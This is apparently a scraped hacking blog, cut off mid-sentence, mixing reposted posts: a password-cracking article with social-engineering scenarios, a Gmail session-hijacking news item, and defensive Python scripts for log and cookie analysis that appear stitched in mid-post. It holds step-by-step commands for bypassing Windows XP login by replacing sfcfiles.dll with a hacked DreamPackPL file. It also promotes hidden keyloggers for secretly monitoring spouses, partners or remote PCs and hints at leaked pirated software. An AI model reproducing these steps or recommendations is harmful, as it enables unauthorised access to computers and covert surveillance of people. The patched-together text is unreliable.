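2009-03-03T03:09:26 nas=rtr-edge-2 src=10.20.30.44 user=admin result=FAIL
2009-03-03T14:22:03 nas=rtr-edge-2 src=10.20.32.9 user=netops result=FAIL
2009-03-03T14:22:40 nas=rtr-edge-2 src=10.20.32.9 user=netops result=FAIL
2009-03-03T14:23:02 nas=rtr-edge-2 src=10.20.32.9 user=netops result=PASS
2009-03-04T03:07:49 nas=rtr-core-1 src=10.20.30.44 user=admin result=FAIL
2009-03-04T03:08:30 nas=unix-db-1 src=10.20.30.44 user=oracle result=FAIL
"""


def parse(line):
    """Turn one record into a dict with a real datetime under 'ts'."""
    ts, *pairs = line.split()
    rec = dict(p.split("=", 1) for p in pairs)
    rec["ts"] = datetime.fromisoformat(ts)
    return rec


def load(text):
    return [parse(line) for line in text.splitlines() if line.strip()]


def failures_by_hour(records):
    """Histogram of failed logins by hour of day (shows the 3 a.m. spike)."""
    return Counter(r["ts"].hour for r in records if r["result"] == "FAIL")


def multi_device_guessing(records, window=timedelta(minutes=30), min_devices=3):
    """Map each source to the dates on which it failed logins against at
    least min_devices different devices inside one sliding time window."""
    by_src = defaultdict(list)
    for r in records:
        if r["result"] == "FAIL":
            by_src[r["src"]].append(r)
    hits = defaultdict(set)
    for src, fails in by_src.items():
        fails.sort(key=lambda r: r["ts"])
        start = 0
        for end in range(len(fails)):
            # Shrink the window from the left until it spans <= window.
            while fails[end]["ts"] - fails[start]["ts"] > window:
                start += 1
            devices = {f["nas"] for f in fails[start:end + 1]}
            if len(devices) >= min_devices:
                hits[src].add(fails[end]["ts"].date().isoformat())
    return {src: sorted(dates) for src, dates in hits.items()}


def report(text, min_nights=2):
    """Summarise the busiest hour and the sources that repeat on several nights."""
    records = load(text)
    peak_hour, peak_failures = failures_by_hour(records).most_common(1)[0]
    repeat = {s: d for s, d in multi_device_guessing(records).items()
              if len(d) >= min_nights}
    return {"peak_hour": peak_hour, "peak_failures": peak_failures,
            "repeat_sources": repeat}


if __name__ == "__main__":
    print(report(SAMPLE_LOG))
```

A single mistyped password or two retries on one device stay below the thresholds; only the source that walks across several devices on more than one night is reported.

<p>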
You can see how a network supervisor had his Cisco routers and switches cracked by a help desk technician within the company.</p><p><a name="h2"><span class="smalltitle">Example: The help desk technician</span></a></p><p> Tommy is hired for the position of help desk technician to work with the after hours help desk crew. The after hours help desk staff is made up of roughly 10 technicians who provide coverage for eight remote sites that the company needs to support during off hours. Tommy always brings his laptop with him to work. When questioned about the laptop by his manager, Tommy explains that he is using his break time to prepare for a certification test. This seems harmless and is approved, even though there is a company-wide security policy in place about bringing machines from the outside into the corporate network without corporate security looking the device over.</p><p>Tommy is eventually caught by a surveillance camera leaving a small wiring closet with something under his arm. But since nothing is reported missing, there is no way to prove that Tommy has done anything wrong. And when questioned by the help desk manager about why he was in the closet, Tommy says that he mistakenly entered it thinking it was a break room.</p><p>The company's security manager, Erika, sees the report filed by the guards responsible for the physical security of the building. She wonders what Tommy was doing in that closet and is not satisfied with the answer he gave to the help desk manager. Upon searching the closet, she finds an unplugged patch cable hanging from one of the patch panels and an empty hub port. When she plugs the cable back in, the link light does not come back on suggesting that this is a dead port. Cable management Velcro straps neatly hold all the other cables together. 
With Erika's years of experience and keen sense of security exploitation, she knows exactly what happened.</p><p>Erika assumes that Tommy has brought his laptop into the wiring closet unseen. He most likely looked for a dead port on the hub and plugged his laptop in with a packet sniffer installed on it, which promiscuously picks up traffic on a network segment. He returns later to pick up the laptop, which is caught on the surveillance camera, to take home for analysis after saving the capture file.</p><p>Using the company's security policy, she confronts Tommy and explains that all personal property, such as laptops and palm pilots, is subject to search if on the premises illegally. Since Tommy never should have had his laptop there in the first place, he hands it over to Erika. Upon careful examination, Erika finds the following trace decode as seen in Figure 1.</p><br /><a name="figure1"><b>Figure 1. Captured telnet traffic with a protocol analyzer</b></a><br /><img alt="Figure 1. Captured telnet traffic with a protocol analyzer" src="http://www.ibm.com/developerworks/library/s-crack/protocolanalyzer.gif" width="600" height="110" /><br /><p>A close examination of the Hex pane of the Sniffer Pro analyzer in Figure 2 reveals ASCII data in clear view on the right side of the pane. While attached to a switch in the closet, Tommy ran the configuration while connected via a telnet session. Since the telnet protocol is insecure and sends everything in cleartext, it is easy to see the password: "cisco."</p><br /><a name="figure2"><b>Figure 2. ASCII decode of plaintext data </b></a><br /><img alt="plaintext data" src="http://www.ibm.com/developerworks/library/s-crack/plaintextdata.gif" width="600" height="148" /><br /><p>This is one of the most basic principles of security: Never use a product name as a password. 
But in spite of how basic a principle it is, it's remarkable how often it is still done.</p><p>Next, turn your attention to some external threats.</p><br /><p><a name="h1"><span class="atitle">External attacks</span></a></p><p> External attackers are those who must traverse your "defense in depth" to try and break into your systems. They don't have it as easy as internal attackers. The first scenario involves a fairly common form of external attack known as Web site defacing. This attack uses password cracking to penetrate the systems that the attacker wants to deface. Another possible password cracking attack is when an attacker tries to obtain passwords via Social Engineering. Social Engineering is the tricking of an unsuspecting administrator into giving the account ID and passwords over to an attacker. Let's take a look at both. </p><p><a name="h2"><span class="smalltitle">Example: Web site home page defacing</span></a></p><p> Figure 3 demonstrates a fairly common and simple example of external password cracking: defacing a Web site's home page. It takes little effort and is usually accomplished by simply exploiting an Internet Information Server (IIS) that has its permissions set incorrectly. The attacker simply goes to a workstation and tries to attack the IIS server with an HTML editing tool. 
When trying to attach over the Internet to the site, the attacker uses a password generator tool, such as L0phtCrack, which launches a brute force attack against the server.</p><br /><a name="figure3"><b>Figure 3. Home page replaced by an attacker </b></a><br /><img alt="Figure 3. Home page replaced by an attacker" src="http://www.ibm.com/developerworks/library/s-crack/homepagedefaced.jpg" width="600" height="345" /><br /><p>Your company's reputation is on the line. Business vendors and associates will lose faith in you if they perceive that your data is kept on unsecured servers. Make sure you look at inside and outside threats equally.</p><p><a name="h2"><span class="smalltitle">Example: Social engineering tricks</span></a></p><p> Non-tool related tricks to crack passwords are called social engineering attacks. Read this scenario to learn more.</p><p>Jon is the new security analyst for a large company. His first job is to test his company's security stance. He of course lets management know what he is about to do (so he doesn't get labeled as an attacker himself). He wants to see how hard it is to crack into the network without even touching a single tool. He tries two separate but equally devastating attacks.</p><p>As a new employee in a large organization, Jon isn't known to many people yet, which makes it easy for him to pull off his first social engineering attack. His first target is the help desk. Jon makes a routine call to the help desk and asks for a password reset as a supposed remote user. Jon already has half the information he needs since he knows that the company's naming convention is simply first name and the first initial of the user's last name. The CIO's name is Jeff and his last name is Ronald, so <code>JeffR</code> is his login ID. This information is readily available from the company's phone directory. Masquerading as the CIO, Jon calls the help desk and asks for a password reset because he has forgotten his password. 
This is a normal ritual for the help desk technician, who resets forgotten passwords 100 times a day and calls the requestor back to let them know what their new password is. The help desk technician calls Jon back five minutes later and lets him know that his new password is "friday" because it happens to be Friday. Within another 5 minutes, Jon is in the CIO's shared files on the server and in his e-mail.</p><p>Jon's next social engineering attack involves a good friend of his who works for the local telephone company. Jon borrows some of his gear and his belt and badge on his friend's day off. Jon takes his new gear and heads to another part of the organization's campus where all the disaster recovery routers and servers are located. This hardware contains a working copy of all the company's current data and is considered confidential. Jon walks into the campus security office in his Telco costume and explains that he has been called out by the Local Exchange Carrier (LEC) because a circuit appears to be looped from the Telco. He needs to be let into the data center so he can check out if there are any alarms on the Smart Jack.</p><p>The onsite administrator escorts Jon to the data center, not even checking his ID. Once inside, the administrator wisely sticks around, so Jon starts his test. After a few minutes, Jon informs the administrator that he will have to call his office and have them run some more tests so he can loop off the Smart Jack and try to troubleshoot. Jon lets the administrator know that this will take about 45 minutes, so the administrator gives Jon his pager number and asks that he page him when he is done to let him out. Jon has now successfully eliminated the only obstacle between him and the 30 servers all lined up in racks along the back wall of the data center.</p><p>Jon has a few different opportunities now. He can go to every server and start looking for unlocked consoles, or he can plug his laptop into an open port and start sniffing. 
Since he really wants to see how far he can go, he decides to look for open consoles. After five minutes of looking through all the KVM slots, he finds a Windows NT server running as the Backup Domain Controller for the Domain. Jon pulls a CD out of his bag and inserts it into the CD tray of the server. He installs L0phtCrack onto a BDC for the company's Domain and runs a dictionary attack. Within five minutes it produces the following password: Yankees. It turns out the lead administrator is a New York Yankees fan. He now has access to the company's most vital information.</p><p>Now look at how this was done.</p><br /><a name="figure4"><b>Figure 4. Using L0phtCrack to break the Administrator password</b></a><br /><img alt="Figure 4. Using L0phtCrack to break the Administrator password" src="http://www.ibm.com/developerworks/library/s-crack/L0phtCracktool.gif" width="600" height="411" /><br /><br /><p><a name="h1"><span class="atitle">A protection check list</span></a></p><p> Here is a checklist of things you can do to make password cracking more difficult:</p><ul><li>Audit your organization! Do a walk through and make sure passwords are not stuck to monitors or under keyboards.</li><li>Set up dummy accounts. 
Get rid of the administrator (or admin) account or set it up as a trap and audit it for attempts.</li><li>Use strong, difficult to guess passwords, and never leave a console unlocked.</li><li>Backups are necessary in case you are compromised. You need a working set of data, so make sure you have it. Keep the tapes secure too, or the data there will be compromised as well. </li><li>Prevent dumpster diving. Don't throw sensitive information away; shred it or lock it up.</li><li>Check IDs and question people you don't know. When you have visitors, check them out and make sure they belong.</li><li>Educate your end users. Make sure they aren't prone to social engineering and educate and remind internal users of the company's security policies.</li></ul><br /><p><a name="h1"><span class="atitle">Summary</span></a></p><p> In this article I've described some of the psychology behind an attacker's motivation and some of the low-tech and high-tech methods used to crack passwords. You've looked at several attack scenarios, including attacks against major companies by a veteran administrator, a help desk technician, and an outside vandal. You also saw how password crackers use techniques both internally and externally to your infrastructure. 
Finally, some ideas on how to properly secure yourself and your systems from the possibility of a password cracking attack were offered. Combating these attacks ultimately requires a conscious effort, trained individuals, useful tools, and sound security policies. Hopefully, as a proactive security analyst, you can make a difference in helping to slow down this malicious activity within your organizations as well as outside of them. Otherwise, you may find Jon in your server room with a smirk on his face and your data in his hands.</p>Praba.... a Hacker......http://www.blogger.com/profile/17884637785245594852noreply@blogger.com0tag:blogger.com,1999:blog-531974719972011792.post-1513589757074850272009-07-28T07:05:00.001-07:002009-07-28T07:05:54.139-07:00Setting Windows XP User Account with Random Password
There are many freeware tools that can generate random passwords for you if you can’t decide what password to use for your internet banking, e-mail, user accounts and so on. It’s not that hard to program something like that, which is why most random password generators are offered free. A good password will have numbers, letters, and special characters with at least 8 characters. You don’t have to download and install a random password generator, even a free one, because Windows already has one built in! It can also set the randomly generated password as your Windows user account’s password.<br /><br />Run the command prompt by clicking on Start, then Run,<br /><img src="http://www.raymond.cc/images/startrunrandom.gif" alt="Windows Start Run" /><br />and type the word ‘<strong>CMD</strong>’. Click OK.<br /><img src="http://www.raymond.cc/images/runcmdrandom.gif" alt="Windows Command Prompt" /> <p>On the command line you can type:<br /><span style="font-size: 16px;"><strong>net user [username] /random</strong></span> (an example below)<br /><img src="http://www.raymond.cc/images/xprandompass.gif" alt="Generate Random Password from Windows" /></p> Now the password for the user “<strong>administrator</strong>” is “<strong>NP3pnbZ8</strong>”. This method only works for LOCAL accounts. One important note: be very careful with a random password, because unless you memorize it or write it down somewhere you won’t be able to log in to Windows. If you’ve forgotten the random password, read this article on <a href="http://www.raymond.cc/blog/archives/2006/09/02/how-to-hack-into-a-windows-xp-computer-without-changing-password/">how to hack into Windows without knowing the password</a>.Praba.... 
a Hacker......http://www.blogger.com/profile/17884637785245594852noreply@blogger.com0tag:blogger.com,1999:blog-531974719972011792.post-37219836195306437722009-07-28T07:04:00.001-07:002009-07-28T07:04:33.111-07:00Reset and Edit Windows Local Administrator and User Password
Two of the best ways to log in to Windows if you’ve forgotten the password are resetting the password or replacing sfcfiles.dll with a cracked one to allow login with any password. However, a lot of anti-virus products detect the cracked sfcfiles.dll as a hacktool and prevent the DLL file from loading, making it unusable.<br /><br />The best and most successful way to log in to Windows if you’ve forgotten the password is by resetting the password. All you need to do is put in a BootCD, boot up with it and follow the simple instructions to reset any user’s password. No bruteforce cracking, modifying of cracked DLL files….<br /><br />Today I found a piece of software that’s better and more powerful than Windows Key included in Passware Kit Enterprise.<br /><br /><strong>Active@ Password Changer</strong> is designed for resetting local administrator and user passwords on Windows XP / VISTA / 2003 / 2000 / NT systems in case an Administrator’s password is forgotten or lost. You do not need to re-install and re-configure the operating system.<br /><img src="http://www.raymond.cc/images/apc-main-screen.png" alt="Active_Password.Changer.Pro.v3.5.build.0067" /> <p>The forgotten password recovery software has a simple user interface, supports multiple hard disk drives, detects several SAM databases (if multiple OS were installed on one volume) and provides the opportunity to pick the right SAM before starting the password recovery process. It displays a list of all local users. The software user simply chooses the local user from the list to reset the password.</p> <p>This is the part which makes Active@ Password Changer better than Windows Key. 
Other Windows login security restrictions like ‘<strong>Account is disabled</strong>’, ‘<strong>Password never expires</strong>’, ‘<strong>Account is locked out</strong>’, ‘<strong>User Must Change Password at Next Logon</strong>’ and ‘<strong>Logon Hours</strong>’ can be changed or reset.<br /><img src="http://www.raymond.cc/images/active-password-changer.png" alt="Reset Administrator Password" width="400" /><br />You’ll be surprised that this feature is included in the DOS version!<br /><img src="http://www.raymond.cc/images/active-password-dos.gif" alt="Hack Administrator Password" width="400" /></p> <p>Windows Key only works in DOS but Active@ Password Changer has programs for Windows and DOS. Surprisingly, Active@ Password Changer only costs USD59.99 while Windows Key costs USD195.00 for the Professional version and USD295.00 for the enterprise version. Obviously you’ll purchase Active@ Password Changer if given a choice as it’s cheaper and better.</p> <p>The free Demo version allows you to detect the correct Windows SAM database, view the user list and specific user attributes. The Professional version allows the user to actually reset passwords and attributes.</p> <p>P/S: The retail version of Active@ Password Changer Pro v3.5 build 0067 has already been leaked out. But very sorry, I am unable to provide the links. Please do <strong>NOT</strong> ask or request for it here. Use your friendly Google ;) </p> <strong>[ <a href="http://www.password-changer.com/download.htm">Download Active@ Password Changer Demo</a> ]</strong>Praba.... a Hacker......http://www.blogger.com/profile/17884637785245594852noreply@blogger.com0tag:blogger.com,1999:blog-531974719972011792.post-12942861493920700062009-07-28T06:57:00.000-07:002009-07-28T07:00:07.290-07:00How to Hack Into a Windows XP Computer Without Changing Password
One method to log in to a password-protected Windows installation even if you do not have the password is to make Windows accept any password.<br />There is a far better way to get into Windows XP. It is easy and it does not reset the password. Hack into a computer running Windows XP without changing the password and find out all and any passwords on the machine (including admin accounts). You do not need access to any accounts to do this. 
Of course, do not do this on anyone else’s computer without proper authorisation.<br /><img src="http://www.raymond.cc/images/wxplgn06.gif" alt="Bypass Windows Login screen" /> <p><strong>Steps to Hack into a Windows XP Computer without changing password:</strong><br />1. Get physical access to the machine. Remember that it must have a CD or DVD drive.<br />2. <a href="http://rapidshare.com/files/92000816/dpl.zip">Download DreamPackPL HERE</a>.<br />3. Unzip the downloaded dpl.zip and you’ll get dpl.ISO.<br />4. Use any burning program that can burn ISO images.<br />5. After you have the disk, boot from the CD or DVD drive. You will see Windows 2000 Setup and it will load some files.<br />6. Press “<strong>R</strong>” to install DreamPackPL.<br />7. Press “<strong>C</strong>” to install DreamPackPL by using the recovery console.<br />8. Select the Windows installation that is currently on the computer (Normally is “1” if you only have one Windows installed)<br />9. 
Backup your original sfcfiles.dll by typing:<br />“<strong>ren C:\Windows\System32\sfcfiles.dll sfcfiles.lld</strong>” (without quotes)<br />10. Copy the hacked file from CD to system32 folder. Type:<br />“<strong>copy D:\i386\pinball.ex_ C:\Windows\System32\sfcfiles.dll</strong>” (without quotes and assuming your CD drive is D:)<br />11. Type “exit”, take out disk and reboot.<br />12. In the password field, type “<strong>dreamon</strong>” (without quotes) and DreamPack menu will appear.<br />13. Click the top graphic on the DreamPack menu and you will get a menu popup.<br /><img src="http://www.raymond.cc/images/dreamon.gif" alt="Hack Windows Login Dreamon" /><br />14. Go to commands and enable the options and enable the god command.<br /><img src="http://www.raymond.cc/images/dppl06.gif" alt="Bypass and hack user account passwords" /><br />15. Type “god” in the password field to get in Windows.</p> <p>You can also go to Passwords and select “Logon with wrong password and hash”. This option allows you to login with ANY password.</p> <strong>Note:</strong> I was unable to bring up the DreamPackPL for the first time because I have Kaspersky Anti-Virus already running in background. I believe most antivirus already labelled this tool as a Hack-Tool. A Hack-Tool is NOT a virus. DreamPackPL helps you bypass the Windows Login screen and it is not destructive.Praba.... a Hacker......http://www.blogger.com/profile/17884637785245594852noreply@blogger.com0tag:blogger.com,1999:blog-531974719972011792.post-86819828256131010472009-07-28T06:08:00.000-07:002009-07-28T06:09:09.628-07:00Gmail Account Hacking Tool<p>A tool that automatically steals IDs of non-encrypted sessions and breaks into Google Mail accounts has been presented at the Defcon hackers’ conference in Las Vegas.</p> <p>Last week Google introduced a new feature in Gmail that allows users to permanently switch on SSL and use it for every action involving Gmail, and not only for authentication. 
Users who did not turn it on now have a serious reason to do so, as Mike Perry, the reverse engineer from San Francisco who developed the tool, is planning to release it in two weeks.</p> <p>When you log in to Gmail the website sends a cookie (a text file) containing your session ID to the browser. This file makes it possible for the website to know that you are authenticated and keep you logged in for two weeks, unless you manually hit the sign out button. When you hit sign out this cookie is cleared.</p> <p>Even though Gmail forces the authentication over SSL (Secure Socket Layer) when you log in, you are not secure because it reverts back to a regular unencrypted connection after the authentication is done. According to Google this behavior was chosen because of low-bandwidth users, as SSL connections are slower.</p> <p>The problem lies with the fact that every time you access anything on Gmail, even an image, your browser also sends your cookie to the website. This makes it possible for an attacker sniffing traffic on the network to insert an image served from http://mail.google.com and force your browser to send the cookie file, thus getting your session ID. Once this happens the attacker can log in to the account without the need of a password. People checking their e-mail from public wireless hotspots are obviously more likely to get attacked than the ones using secure wired networks. 
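The cookie handling described above can be modelled in a few lines to show what the Secure attribute changes. This is an added example, not code from the original post or from the tool it mentions; the host name, cookie name and value are constructed, and the matching rules are a simplified version of what browsers do.

```python
# Added example, not from the original post. Host, cookie name and value are
# constructed; the matching rules are a simplified model of browser behaviour.
from dataclasses import dataclass
from urllib.parse import urlsplit


@dataclass
class Cookie:
    name: str
    value: str
    origin_host: str      # host that sent the Set-Cookie header
    domain: str = ""      # empty string means a host-only cookie
    path: str = "/"
    secure: bool = False
    http_only: bool = False


def parse_set_cookie(header_value, origin_host):
    """Parse one Set-Cookie header value into a Cookie (simplified)."""
    first, *attributes = [part.strip() for part in header_value.split(";")]
    name, _, value = first.partition("=")
    cookie = Cookie(name.strip(), value.strip(), origin_host.lower())
    for attribute in attributes:
        key, _, val = attribute.partition("=")
        key, val = key.strip().lower(), val.strip()
        if key == "secure":
            cookie.secure = True
        elif key == "httponly":
            cookie.http_only = True
        elif key == "domain" and val:
            cookie.domain = val.lstrip(".").lower()
        elif key == "path" and val.startswith("/"):
            cookie.path = val
    return cookie


def path_matches(request_path, cookie_path):
    """Path-match test: equal, or the cookie path is a directory prefix."""
    if request_path == cookie_path:
        return True
    if request_path.startswith(cookie_path):
        return cookie_path.endswith("/") or request_path[len(cookie_path)] == "/"
    return False


def browser_would_send(cookie, url):
    """True if a browser would attach the cookie to a request for url."""
    parts = urlsplit(url)
    host = (parts.hostname or "").lower()
    if cookie.secure and parts.scheme != "https":
        return False      # Secure cookies are never sent over plain HTTP
    if cookie.domain:
        if host != cookie.domain and not host.endswith("." + cookie.domain):
            return False
    elif host != cookie.origin_host:
        return False
    return path_matches(parts.path or "/", cookie.path)


def audit(cookie):
    """List the protective attributes a session cookie is missing."""
    findings = []
    if not cookie.secure:
        findings.append(cookie.name + ": no Secure attribute, also sent over http://")
    if not cookie.http_only:
        findings.append(cookie.name + ": no HttpOnly attribute, readable by page scripts")
    return findings


HOST = "mail.example.test"
# The behaviour the post describes: the login runs over HTTPS, but the session
# cookie is issued without Secure. Max-Age is two weeks, as in the post.
WEAK_HEADER = "SID=constructed-session-id; Path=/; Max-Age=1209600"
HARDENED_HEADER = WEAK_HEADER + "; Secure; HttpOnly"

SAMPLE_REQUESTS = [
    "https://mail.example.test/mail/inbox",
    "http://mail.example.test/images/logo.gif",   # any plain-HTTP fetch, even an image
]


def exposure(header_value):
    """Map each sample request URL to whether the cookie would be attached."""
    cookie = parse_set_cookie(header_value, HOST)
    return {url: browser_would_send(cookie, url) for url in SAMPLE_REQUESTS}


if __name__ == "__main__":
    for label, header in (("weak", WEAK_HEADER), ("hardened", HARDENED_HEADER)):
        print(label, header)
        for url, sent in exposure(header).items():
            print("   ", "SENT    " if sent else "withheld", url)
        for finding in audit(parse_set_cookie(header, HOST)):
            print("    finding:", finding)
```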
<span style="color: rgb(0, 0, 0);">Todd Mumford, from the <a title="SEO Visions" href="http://www.seovisions.com/" target="_blank">SEO company</a> called <a title="SEO Visions" href="http://www.seovisions.com/internet-marketing.html" target="_blank">SEO Visions Inc</a>, states “This can be a serious problem for Internet Marketers who travel often and use their wireless laptops and Gmail services often and do not always have access to a secure connection”</span></p> <p><span style="color: rgb(0, 0, 0);">Per</span>ry mentioned that he notified Google about this situation over a year ago and even though eventually it made this option available, he is not happy with the lack of information. “Google did not explain why using this new feature was so important” he said. He continued and explained the implications of not informing the users, “This gives people who routinely log in to Gmail beginning with an https:// session a false sense of security, because they think they’re secure but they’re really not.”</p> <p>If you are logging in to your Gmail account from different locations and you would like to benefit from this option only when you are using unsecured networks, you can force it by manually typing https://mail.google.com before you log in. This will access the SSL version of Gmail and it will be persistent over your entire session and not only during authentication.</p>Praba.... a Hacker......http://www.blogger.com/profile/17884637785245594852noreply@blogger.com0tag:blogger.com,1999:blog-531974719972011792.post-21352763785922724712009-07-24T06:46:00.001-07:002009-07-24T06:46:56.528-07:00Hack BSNL Broadband for Speed
<p><a href="http://www.gohacking.com/wp-content/uploads/2008/12/broadband.jpg"><img class="alignleft size-thumbnail wp-image-341" title="broadband" src="http://www.gohacking.com/wp-content/uploads/2008/12/broadband-150x150.jpg" alt="" width="150" height="150" /></a></p> <p>If you are a BSNL broadband user, chances are that you are facing frequent DNS issues. Their DNS servers are just unresponsive. Lookups take a long time and many times just time out. The solution? There is a small hack on BSNL for this. Use third party DNS servers instead of BSNL DNS servers or run your own one like <a class="external" title="DJBDNS" rel="nofollow" href="http://cr.yp.to/djbdns.html" target="_blank"><strong><span style="color: rgb(0, 85, 0);">djbdns</span></strong></a>. The easiest option is to use <a class="external" title="OpenDNS" rel="nofollow" href="http://www.opendns.com/" target="_blank"><strong><span style="color: rgb(0, 85, 0);">OpenDNS</span></strong></a>. 
Just reconfigure your network to use the following DNS servers:</p> <p>208.67.222.222<br />208.67.220.220</p> <p>Detailed instructions specific to your operating system or your BSNL modem are available on the OpenDNS website itself. After I reconfigured my BSNL modem to use the above 2 IP addresses, my DNS problems just vanished! Other ‘freebies’ that come with OpenDNS are phishing filters and automatic URL correction. Even if your service provider’s DNS servers are working fine, you can still use OpenDNS just for these two special features. After you hack BSNL DNS servers, you will see a noticeable improvement in your broadband speed.</p>Praba.... a Hacker......http://www.blogger.com/profile/17884637785245594852noreply@blogger.com0tag:blogger.com,1999:blog-531974719972011792.post-1599553360705464132009-07-24T06:45:00.001-07:002009-07-24T06:45:27.432-07:00How to Monitor a Local or Remote Computer
<p style="text-align: center;"><img class="size-full wp-image-961 aligncenter" title="monitor_pc" src="http://www.gohacking.com/wp-content/uploads/2009/02/monitor_pc.jpg" alt="monitor_pc" width="239" height="191" /></p> <p>Most of the time, it becomes necessary for us to monitor our own computer or a remote computer to keep track of the activities going on. This may be for several reasons. Especially it is most necessary for the parents to monitor their computer to keep track of their children’s activities during their absence. Some people may also require to monitor their computer to keep an eye on the activities of their spouse or partner. Today, with the advancement in the field of the software technology, it’s just a cakewalk to monitor the computer. For this all you have to do is use a <strong>PC Monitoring Software</strong>.</p> <p>But the job doesn’t end here. This is because there exist tons of such monitoring softwares on the market and many times we get confused which to choose and how to use them. So I have decided to make this job simpler for you, by writing this post. In this post I’ll give detailed information about Computer monitoring softwares which include their features, advantages, installation, usage procedure and so on. To make this post interesting, let’s take up each topic in the form of question and answer.</p> <h3>What exactly is a Monitoring Software and how can it help me?</h3> <p>A computer monitoring software is just like any other software (program) which when installed, secretly monitors <strong>each and every activity</strong> that takes place on the computer. 
The activities such as web browsing, chatting, gaming etc. are all recorded and saved. These monitoring softwares can record each and every keystroke. So it is possible to capture usernames and passwords very easily with minimum effort. Monitoring softwares are also commonly known as <strong>Keyloggers</strong>.</p> <h3>How can I install a monitoring software?</h3> <p>Installing a monitoring software is too simple. During the installation, you need to setup a <strong>secret password and hotkey combination</strong> which is required later to see the recorded data (logs). After the installation is complete the software goes invisible, but keeps running in the background. Whenever you want to see the logs, just press the hotkey combination (ex. Shift+Ctrl+F10). Now a small window will popup asking for a password. Here you need to enter the password that was setup during the installation time. After you enter the password you’ll be able to see all the activities that took place on the computer during your absence.</p> <h3>Can the person using the computer come to know about the presence of the Monitoring Software?</h3> <p>Most of the time it becomes impossible to detect the presence of the monitoring software. This is because, once installed it hides itself from Start menu, Program Files, Control Panel, Task manager etc. Because of its stealth behaviour the user can never come to know that he/she is under the presence of monitoring.</p> <h3>Which Monitoring Software should I use?</h3> <p>There exist different flavours of these softwares and you have to choose the one that best matches your needs. 
Here is a list of some of the best monitoring programs that I recommend.</p> <p><strong>For Monitoring a Local PC:</strong></p> <p>If you want to monitor a local PC (maybe your own PC) then the following program is recommended.</p> <p><a rel="nofollow" href="http://www.gohacking.com/recommends/ts/spy_agent.php?Mon_PC" target="_blank"><strong>Spy Agent Stealth</strong></a> </p> <p>You can find a <strong>Complete Installation Guide </strong>for <strong>Spy Agent Stealth </strong><a rel="nofollow" href="http://www.gohacking.com/recommends/spyagent_help.html" target="_blank"><strong>HERE</strong></a></p> <p><strong>For Monitoring a Remote PC (Also works on local PC) :</strong></p> <p>If you want to monitor a remote PC you may use the following programs. These programs work for remote PC as well as local PC.</p> <p><strong><a rel="nofollow" href="http://www.gohacking.com/recommends/ts/winspy.php?Mon_PC" target="_blank">Win-Spy Monitor</a> </strong></p> <p>You can find a <strong>Complete Installation Guide </strong>for <strong>Win-Spy Monitor </strong><a rel="nofollow" href="http://www.gohacking.com/recommends/winspy_help.html" target="_blank"><strong>HERE</strong></a></p> <p><strong><a rel="nofollow" href="http://www.gohacking.com/recommends/ts/realtime_spy.php?Mon_PC" target="_blank">Realtime Spy</a></strong></p> <p>You can find a <strong>Complete Installation Guide </strong>for <strong>Realtime Spy <a href="http://www.gohacking.com/recommends/realtimespy_help.html" target="_blank">HERE</a></strong></p> <p><strong><a rel="nofollow" href="http://www.gohacking.com/recommends/ts/spy_anywhere.php?Mon_PC" target="_blank">Spy Anywhere</a></strong></p> <p><strong><a rel="nofollow" href="http://www.gohacking.com/recommends/ts/keystroke_spy.php?Mon_PC" target="_blank">Keystroke Spy</a></strong></p> <p><strong>For Monitoring a Network :</strong></p> <p>The following program can be used to monitor an <strong>Entire Network of computers</strong> from one central location. 
This becomes handy to monitor the staff in a company or students in a school/college.</p> <p><strong><a rel="nofollow" href="http://www.gohacking.com/recommends/ts/netvizor.php?Mon_PC" target="_blank">NetVizor</a></strong></p> <p>You can find a <strong>Complete Installation Guide </strong>for <strong>NetVizor</strong> <a rel="nofollow" href="http://www.gohacking.com/recommends/netvizor_help.html" target="_blank"><strong>HERE</strong></a></p> <p><strong>For monitoring a Cell Phone from your PC:</strong></p> <p>If you want to monitor a Cell Phone from your PC you can refer to the following link.</p> <p><strong><a href="http://www.gohacking.com/2009/06/cell-phone-spy.html">Cell Phone Spy</a></strong></p>Praba.... a Hacker......http://www.blogger.com/profile/17884637785245594852noreply@blogger.com0tag:blogger.com,1999:blog-531974719972011792.post-56546936586052729382009-07-24T06:44:00.001-07:002009-07-24T06:44:27.383-07:00Get a Call from your own Cell Phone number
<p><a href="http://www.gohacking.com/wp-content/uploads/2008/12/cellphone.jpg"><img class="alignleft size-medium wp-image-568" title="cellphone" src="http://www.gohacking.com/wp-content/uploads/2008/12/cellphone-300x300.jpg" alt="" width="147" height="147" /></a>Here is a trick to get a call to your cell phone from your own number. Do you think I am crazy? No, I am not…</p> <p>Just try the following steps and you’ll get a call to your cell phone from your own number.</p> <p> </p> <p>1. Just give a missed call to this number. You’ll not be charged!</p> <h3><span style="color: rgb(0, 0, 255);">+41445804650</span></h3> <p>2. Wait for a few seconds and you’ll get a call to your cell phone from your own number.</p> <p>3. Receive the call. You’ll hear a lady’s voice asking for a PIN number. Just enter some rubbish number.</p> <p>4. She says: Your PIN cannot be processed, and the call disconnects.</p> <h2>ANOTHER TRICK</h2> <p>Instead of giving a missed call, just continue calling. The call will not be received and will get disconnected just after a while. But now do you know what happens?</p> <p>You will get a call from the number</p> <h3><span style="color: rgb(0, 0, 255);">+501</span></h3> <h2>Reason behind this trick</h2> <p>God Knows!!</p>Praba.... 
a Hacker......http://www.blogger.com/profile/17884637785245594852noreply@blogger.com0tag:blogger.com,1999:blog-531974719972011792.post-14271561642977824982009-07-24T06:42:00.001-07:002009-07-24T06:42:28.948-07:00Is your Nokia Cell Phone Original
<p><a href="http://www.gohacking.com/wp-content/uploads/2008/12/nokia-phone.jpg"><img class="alignleft size-medium wp-image-237" title="nokia-phone" src="http://www.gohacking.com/wp-content/uploads/2008/12/nokia-phone-158x300.jpg" alt="" width="158" height="300" /></a></p> <p>Nokia is one of the largest selling phones across the globe. Most of us own a Nokia phone but are unaware of its originality. Are you keen to know whether your Nokia mobile phone is original or not? Then you are in the right place and this information is specially meant for you. Your phone’s<strong> IMEI</strong> (International Mobile Equipment Identity) number confirms your phone’s originality.</p> <p>Press the following on your mobile <span style="font-size: 180%;"><span style="font-size: x-large;"><strong><span style="color: rgb(255, 0, 0);">*#06#</span></strong> </span></span><span style="font-size: 100%;">to see your Phone’s <strong>IMEI</strong> number (serial number).</span></p> <p>Then check the <strong><span style="font-size: 180%; color: rgb(255, 0, 0);"><span style="font-size: x-large;">7th</span></span></strong> and <strong><span style="font-size: 180%; color: rgb(255, 0, 0);"><span style="font-size: x-large;">8th</span></span></strong> numbers</p> <p><strong>Phone serial no. <span style="font-size: 130%;"><span style="font-size: large;">x x x x x x<span style="color: 